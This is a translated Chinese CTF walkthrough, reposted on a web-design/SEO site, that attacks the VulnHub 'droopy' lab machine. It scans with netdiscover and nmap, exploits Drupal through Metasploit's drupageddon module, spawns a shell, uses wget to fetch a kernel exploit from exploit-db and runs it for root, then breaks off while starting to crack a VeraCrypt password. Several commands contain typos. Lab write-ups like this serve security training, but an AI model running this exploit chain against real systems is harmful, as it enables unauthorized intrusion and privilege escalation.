• 我爱技术网-河南网站建设-上海网站建设-SEO优化-网络营销-SEO三人行

  • 专注网站建设 服务热线: 13061801310

当前位置:我爱技术网 > SEO优化 > SEO白帽 > 正文

CTF夺旗挑战!看老外如何玩转! 即刻安全

发布时间:2018-05-07 | 发布者: 东东工作室 | 浏览次数:

你的位置:即刻安全 > 原创翻译 > CTF夺旗挑战!看老外如何玩转!

CTF夺旗挑战!看老外如何玩转!

原创翻译 Eternal 2年前 (2016-08-31) 2077浏览

在这篇文章中,我们将完成一个 CTF系列的 root2boot 挑战!这个演练将在 droopy 这个漏洞框架上完成,这是一个有一定难度的框架平台。我们可以从这里下载到:https://download.vulnhub.com/droopy/ 。

演练开始:

首先让我们来确定我们要攻击的目标,利用 IP 扫描工具 netdiscover 来查找目标 IP:

netdiscover

1

我们要攻击的目标是 192.168.1.103 ,确定目标后我们再利用 nmap 来进行服务端口的扫描:

nmap -A 192.168.1.103

2

通过以上简单的扫描,我们可以看到目标开放了 80 端口,并且使用了带有利用漏洞的 Drupal 7 版本(Drupal是使用PHP语言编写的开源内容管理框架(CMF)),在得到以上信息后,下面我们使用 MSF 来对漏洞进行利用!

search drupal

3

我们使用一下利用模块:

use exploit/multi/http/drupal_drupageddon

msf exploit (drupal_drupageddon)>set rhost 192.168.1.103 (目标机器IP)

msf exploit (drupal_drupageddon)>set rport 80

msf exploit (drupal_drupageddon)>exploit

4

在成功利用了漏洞后,我们得到了一个 meterpreter 的 session ,为了有一个更加直观的显示路径,我们接着使用如下命令,来进入 droopy的终端界面:

hell

echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

进入终端界面后,我们首先来查看该目标系统的内核版本:

lsb_release -a

5

通过以上命令查看,我们得知 该乌班图系统的内核版本为 Ubuntu 14.04 。我们通过 exploit-db.com 这个网站来查找该版本的 exploit !如下:我们成功找到了该版本的 exploit !

6

由于该 exploit 无法再 MSF上直接利用,因此我们需要在目标系统上找到一个有写和执行权限的文件,来下载并执行 exploit !

find / -writable -type d 2>/dev/null

cd /tmp/

wget https://www.exlpoit-db.com/download/37292

8

下面我们来编译并运行 exploit 以获取 root 权限!

mv 37292 37292.c

gcc 37292.c -o kernel

chmod 777 kernel

./kernel

接着我们通过简单的命令查看,我们是否已经取得 root 权限:

whoami

cd /root

ls

9

接着我们在目标系统上发现了一个名为 dave.tc 的文件,当我们使用浏览器打开它时,提示我们进行下载。我们只需将其拷贝到站点根目录下,进行下载即可!

Cp dave.tc /var/ww/html

10

下载完成后,我们使用 veracrypt 来打开它。veracrypt的下载地址:https://veracrypt.codeplex.com/wikipage?title=Downloads

当你打开 VeraCrypt 选择 1 它就会将硬盘挂载到 1 硬盘上。

11

当你尝试打开该文件时,会弹出一个密码输入框,要求我们输入密码。可是现在我们并没有密码,我们来破解密码!

我们进入到保存系统全部密码 hash 值得文件下:

转载请标注:我爱技术网——CTF夺旗挑战!看老外如何玩转! 即刻安全